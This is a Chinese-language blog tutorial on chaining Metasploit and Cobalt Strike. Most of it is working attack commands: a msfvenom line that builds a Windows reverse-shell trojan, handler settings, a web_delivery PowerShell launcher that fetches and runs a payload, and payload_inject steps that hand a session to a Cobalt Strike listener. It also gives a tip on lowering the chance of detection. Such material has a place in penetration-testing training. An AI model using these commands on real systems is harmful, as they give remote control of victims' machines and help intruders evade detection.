MSF与CS联动

 

MSF上线CS

 

1.MSF运行exe上线

先用msfvenom生成一个木马,这里是windows的木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.255.128 LPORT=6666 -f exe >/root/Payload/msf.exe

然后到主机中运行exe

msf监听得到session

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.255.128
set lport 6666
exploit

 

 

 

2.powershell上线

使用powershell上线MSF

使用的不是msf中exploit/multi/handler模块,而是使用的exploit/multi/script/web_delivery

use exploit/multi/script/web_delivery
set target 2 注意这里是 target 2
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.255.128
set lport 6666
run

 

然后复制生成的powershell到windows主机中执行powershell

 

 

成功上线

 

 

 

 

 

 

 

 

启动cs

 

MSF上使用payload_inject模块

use exploit/windows/local/payload_inject 
使用该模块可以将 Metasploit 获取到的会话注入到CS中
set DisablePayloadHandler true 
用来禁用 Metasploit payload handler的监听 因为要监听到cs上
set lhost xxx CSIP
set lport 7869 CS上的listen端口
set session 10 要转发的session

 

 

 

 

 

 

 

 成功上线cs

 

 

 

 在interact交互的时候执行命令返回很慢,是因为cs自带有sleep机制 这样可以减少被检测出的风险

可以通过sleep 1 调整休眠时间

 

 然后再执行命令响应就很快了

 

 
posted @ 2022-03-22 10:55  Erichas  阅读(1051)  评论(0编辑  收藏  举报